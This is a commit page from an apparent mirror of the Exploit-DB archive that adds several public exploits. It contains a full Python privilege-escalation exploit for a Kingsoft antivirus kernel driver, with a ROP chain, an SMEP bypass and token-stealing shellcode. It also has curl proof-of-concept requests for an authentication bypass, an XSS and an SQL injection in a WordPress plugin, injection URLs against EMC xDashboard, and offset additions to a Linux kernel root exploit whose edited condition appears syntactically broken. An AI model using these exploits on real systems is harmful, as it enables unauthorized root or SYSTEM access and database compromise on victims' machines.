bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-01-04

Browse source 
4 changes to exploits/shellcodes

Kingsoft Antivirus/Internet Security 9+ - Privilege Escalation
WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass  / SQL Injection
EMC xPression 4.5SP1 Patch 13 - 'model.jobHistoryId' SQL Injection
This commit is contained in:
Offensive Security 2018-01-04 05:02:14 +00:00
parent c03d2a3ba2
commit 3eec0e4999
5 changed files with 343 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
exploits/linux/local/43418.c
View file

@ -2,6 +2,9 @@
// Includes KASLR and SMEP bypasses. No SMAP bypass.
// Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels.
//
// EDB Note: Also included the work from ~ https://ricklarabee.blogspot.co.uk/2017/12/adapting-poc-for-cve-2017-1000112-to.html
// Supports: Ubuntu Xenial (16.04) 4.4.0-81
//
// Usage:
// user@ubuntu:~$ uname -a
// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
@ -130,6 +133,7 @@ struct kernel_info kernels[] = {
{ "xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
{ "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
{ "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
{ "xenial", "4.4.0-81-generic", 0xa2800, 0xa2bf0, 0x8a, 0x3eb4ad, 0x112697, 0x1b9c0, 0x40341a, 0x1de6c, 0x7a453, 0x125787, 0x64580, 0x49ed0 },
};
// Used to get root privileges.
@ -328,6 +332,7 @@ unsigned long get_kernel_addr() {
strncmp("4.4.0", kernels[kernel].version, 5) == 0)
return get_kernel_addr_trusty(syslog, size);
if (strcmp("xenial", kernels[kernel].distro) == 0 &&
strncmp("4.4.0", kernels[kernel].version, 5) == 0) ||
strncmp("4.8.0", kernels[kernel].version, 5) == 0)
return get_kernel_addr_xenial(syslog, size);

41
exploits/multiple/webapps/43422.txt Normal file
View file

@ -0,0 +1,41 @@
Title: EMC xDashboard - SQL Injection Vulnerability
Author: Pawel Gocyla
Date: 02 January 2018
CVE: CVE-2017-14960
Affected Software:
==================
EMC xPression v4.5SP1 Patch 13
Probably other versions are also vulnerable.
SQL Injection Vulnerability:
==============================
This vulnerability allows an attacker to retrieve information from the
database
Vulnerable parameter: "$model.jobHistoryId"
Exploit:
True Condition: https://[victim]:4000/xDashboard/html/jobhistory/
jobDocHistoryList.action?model.jobHistoryId=1736687378927012979202234841133
and 1=1
False Condition: https://[victim]:4000/xDashboard/html/jobhistory/
jobDocHistoryList.action?model.jobHistoryId=1736687378927012979202234841133
and 1=2
Fix:
====
User input which is putted into sql queries should be properly filtred or
sanitized
References:
============
https://www.owasp.org/index.php/SQL_Injection
Contact:
========
pawellgocyla[at]gmail[dot]com

65
exploits/php/webapps/43420.txt Normal file
View file

@ -0,0 +1,65 @@
Exploit Title: Smart Google Code Inserter < 3.5 - Auth Bypass/SQLi
Google Dork: inurl:wp-content/plugins/smart-google-code-inserter/
Date: 26-Nov-17
Exploit Author: Benjamin Lim
Vendor Homepage: http://oturia.com/
Software Link: https://wordpress.org/plugins/smart-google-code-inserter/
Version: 3.4
Tested on: Kali Linux 2.0
CVE : CVE-2018-3810 (Authentication Bypass with resultant XSS)
CVE : CVE-2018-3811 (SQL Injection)
1. Product & Service Introduction:
==================================
Smart Google Code Inserter is a Wordpress plugin that makes it easy to add
Google Analytics tracking code as well as meta tag verification of
Webmaster Tools. As of now, the plugin has been downloaded 34,207 times and
has 9,000+ active installs.
2. Technical Details & Description:
===================================
Authentication Bypass vulnerability in the Smart Google Code Inserter
plugin 3.4 allows unauthenticated attackers to insert arbitrary javascript
or HTML code which runs on all pages served by Wordpress. The
saveGoogleCode() function in smartgooglecode.php does not check if the
current request is made by an authorized user, thus allowing any
unauthenticated user to successfully update the inserted code.
SQL Injection vulnerability, when coupled with the Authentication Bypass
vulnerability in the Smart Google Code Inserter plugin 3.4 allows
unauthenticated attackers to execute SQL queries in the context of the
webserver. The saveGoogleAdWords() function in smartgooglecode.php did not
use prepared statements and did not sanitize the $_POST["oId"] variable
before passing it as input into the SQL query.
3. Proof of Concept (PoC):
==========================
Code Insertion
curl -k -i --raw -X POST -d
"sgcgoogleanalytic=<script>alert("1");</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode"
"http://localhost/wp-admin/options-general.php?page=smartcode" -H "Host:
localhost" -H "Content-Type: application/x-www-form-urlencoded"
SQL Injection
curl -k -i --raw -X POST -d "action=saveadwords&delconf=1&oId[]=1 OR
1=1--&ppccap[]=ex:mywplead&ppcpageid[]=1&ppccode[]=bb&nchkdel1=on" "
http://localhost/wp-admin/options-general.php?page=smartcode" -H "Host:
localhost" -H "Content-Type: application/x-www-form-urlencoded"
4. Mitigation
=============
Update to version 3.5
5. Disclosure Timeline
======================
2017/11/29 Vendor contacted
2017/11/30 Vendor acknowleged and released an update
2018/01/01 Advisory released to the public
6. Credits & Authors:
=====================
Benjamin Lim - [https://limbenjamin.com]

229
exploits/windows/local/43421.py Executable file
View file

@ -0,0 +1,229 @@
'''
Vulnerability Summary
The following advisory describes a kernel stack buffer overflow that leads to privilege escalation found in Kingsoft Antivirus/Internet Security 9+.
Kingsoft Antivirus provides effective and efficient protection solution at no cost to users. It applies cloud security technology to monitor, scan and protect your systems without any worrying. The comprehensive defender and anti-virus tools prevent and protect your computer from unwanted virus, worms, and Trojans. With the simplest and easiest-to-use functions, users find themselves no difficulty to handle Kingsoft Antivirus.
Credit
An independent security researcher, Steven Seeley, has reported this vulnerabilities to Beyond Securitys SecuriTeam Secure Disclosure program
Vendor response
We tried to contact Kingsoft since October 8 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerability.
Vulnerability details
This vulnerability allows local attackers to escalate privileges on vulnerable installations of Kingsoft Internet Security.
The specific flaws exists within the processing of IOCTL 0x80030004 or 0x80030008 by either the kavfm.sys (anti-virus) or the KWatch3.sys (internet security) kernel driver.
The driver doesnt properly validate user-supplied data which can result in a kernel stack buffer overflow.
An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.
; jumptable 000117C1 case 0
.text:000117C8 loc_117C8: ; CODE XREF: sub_11790+31
.text:000117C8
.text:000117C8 push ebx ; our input buffer size
.text:000117C9 lea ecx, [esp+58h+var_40] ; this is a fixed size stack buffer of 0x40
.text:000117CD push edi ; our input buffer
.text:000117CE push ecx ; char *
.text:000117CF call strncpy ; stack buffer overflow
.text:000117D4 add esp, 0Ch
.text:000117D7 lea edx, [esp+54h+var_40]
.text:000117DB push edx ; char *
.text:000117DC mov [esp+ebx+58h+var_40], 0
.text:000117E1 call sub_167B0
.text:000117E6 pop edi
.text:000117E7 mov esi, eax
.text:000117E9 pop esi
.text:000117EA pop ebp
.text:000117EB pop ebx
.text:000117EC add esp, 44h
.text:000117EF retn 8
'''
import sys
from ctypes import *
from time import sleep
from ctypes.wintypes import *
import struct
import os
from random import choice
kernel32 = windll.kernel32
ntdll = windll.ntdll
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS = 0
def get_ioctl():
return choice([0x80030004, 0x80030008])
def alloc_shellcode(base, input_size):
"""
allocates some shellcode
"""
print "(+) allocating shellcode @ 0x%x" % base
baseadd = c_int(base)
size = c_int(input_size)
# --[ setup]
input = struct.pack("<I", 0x000506f8) # bypass smep
# --[ setup]
input += "\x60" # pushad
input += "\x64\xa1\x24\x01\x00\x00" # mov eax, fs:[KTHREAD_OFFSET]
# I have to do it like this because windows is a little special
# this just gets the EPROCESS. Windows 7 is 0x50, now its 0x80.
input += "\x8d\x40\x70" # lea eax, [eax+0x70];
input += "\x8b\x40\x10" # mov eax, [eax+0x10];
input += "\x89\xc1" # mov ecx, eax (Current _EPROCESS structure)
# win 10 rs2 x86 TOKEN_OFFSET = 0xfc
# win 07 sp1 x86 TOKEN_OFFSET = 0xf8
input += "\x8B\x98\xfc\x00\x00\x00" # mov ebx, [eax + TOKEN_OFFSET]
# --[ copy system PID token]
input += "\xba\x04\x00\x00\x00" # mov edx, 4 (SYSTEM PID)
input += "\x8b\x80\xb8\x00\x00\x00" # mov eax, [eax + FLINK_OFFSET] <-|
input += "\x2d\xb8\x00\x00\x00" # sub eax, FLINK_OFFSET |
input += "\x39\x90\xb4\x00\x00\x00" # cmp [eax + PID_OFFSET], edx |
input += "\x75\xed" # jnz ->|
# win 10 rs2 x86 TOKEN_OFFSET = 0xfc
# win 07 sp1 x86 TOKEN_OFFSET = 0xf8
input += "\x8b\x90\xfc\x00\x00\x00" # mov edx, [eax + TOKEN_OFFSET]
input += "\x89\x91\xfc\x00\x00\x00" # mov [ecx + TOKEN_OFFSET], edx
# --[ recover]
input += "\x61" # popad
input += "\x83\xc4\x0c" # adjust the stack by 0xc
input += "\x31\xc0" # return NTSTATUS = STATUS_SUCCESS
input += "\xc3" # ret
# filler
input += "\x43" * (input_size-len(input))
ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
POINTER(c_int), c_int, c_int]
dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
byref(size),
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE)
if dwStatus != STATUS_SUCCESS:
print "(-) Error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
return False
written = c_ulong()
write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))
if write == 0:
print "(-) Error while writing our input buffer memory: %s" % write
return False
return True
def alloc(base, input_size, ip):
baseadd = c_int(base)
size = c_int(input_size)
input = "\x44" * 0x40 # offset to ip
# start our rop chain
input += struct.pack("<I", nt + 0x51976f) # pop ecx; ret
input += struct.pack("<I", 0x75757575) # junk
input += struct.pack("<I", 0x76767676) # junk
input += struct.pack("<I", ip) # load 0x506f8
input += struct.pack("<I", nt + 0x04664f) # mov eax, [ecx]; ret
input += struct.pack("<I", nt + 0x22f2da) # mov cr4,eax; ret
input += struct.pack("<I", ip + 0x4) # &shellcode
# filler
input += "\x43" * (input_size-len(input))
ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
POINTER(c_int), c_int, c_int]
dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,
byref(size),
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE)
if dwStatus != STATUS_SUCCESS:
print "(-) error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
sys.exit()
written = c_ulong()
write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))
if write == 0:
print "(-) error while writing our input buffer memory: %s" % write
sys.exit()
def we_can_trigger_overflow():
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
IOCTL_VULN = get_ioctl()
DEVICE_NAME = "\\\\.\\KWatch3"
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
ip = 0x24242424
inputbuffer = 0x41414141
inputbuffer_size = 0x60
outputbuffer_size = 0x1000
outputbuffer = 0x20000000
alloc(inputbuffer, inputbuffer_size, ip)
alloc_shellcode(ip, 0x100)
alloc(outputbuffer, 0x100, ip)
IoStatusBlock = c_ulong()
if driver_handle:
print "(+) sending stack overflow..."
dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,
None,
None,
None,
byref(IoStatusBlock),
IOCTL_VULN,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)
return True
return False
def we_can_leak_the_base():
"""
Get kernel base address.
This function uses psapi!EnumDeviceDrivers which is only callable
from a non-restricted caller (medium integrity or higher). Also the
assumption is made that the kernel is the first array element returned.
"""
global nt
print "(+) enumerating kernel base address..."
array = c_ulonglong * 1024
lpImageBase = array()
szDriver = array()
cb = sizeof(lpImageBase)
lpcbNeeded = c_long()
res = windll.psapi.EnumDeviceDrivers(byref(lpImageBase),
sizeof(lpImageBase),
byref(lpcbNeeded))
if not res:
print "(-) unable to get kernel base: " + FormatError()
sys.exit(-1)
# nt is the first one
nt = lpImageBase[0] & 0x00000000ffffffff
return True
def main():
print "\n\t--[ Kingsoft Internet Security Kernel Stack Overflow EoP Exploit ]"
print "\t Steven Seeley (mr_me) of Source Incite\r\n"
if we_can_leak_the_base():
print "(+) found nt base at 0x%08x" % (nt)
if we_can_trigger_overflow():
os.system("cmd.exe")
else:
print "(-) it appears that kingsoft Internet Security is not installed!"
if __name__ == '__main__':
main()

3
files_exploits.csv
View file

@ -9242,6 +9242,7 @@ id,file,description,date,author,type,platform,port
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
43397,exploits/bsd/local/43397.md,"Sony Playstation 4 4.05 FW - Local Kernel Loader",2017-12-27,Specter,local,bsd,
43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Privilege Escalation",2018-01-03,mr_me,local,windows,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -37687,6 +37688,8 @@ id,file,description,date,author,type,platform,port
43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)",2017-12-27,"Glafkos Charalambous",webapps,aspx,
43409,exploits/php/webapps/43409.txt,"PHP Melody 2.7.1 - 'playlist' SQL Injection",2017-12-31,"Ahmad Mahfouz",webapps,php,
43414,exploits/hardware/webapps/43414.py,"Huawei Router HG532 - Arbitrary Command Execution",2017-12-25,anonymous,webapps,hardware,37215
43420,exploits/php/webapps/43420.txt,"WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass / SQL Injection",2018-01-03,"Benjamin Lim",webapps,php,
43422,exploits/multiple/webapps/43422.txt,"EMC xPression 4.5SP1 Patch 13 - 'model.jobHistoryId' SQL Injection",2018-01-03,"Pawel Gocyla",webapps,multiple,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,

Can't render this file because it is too large.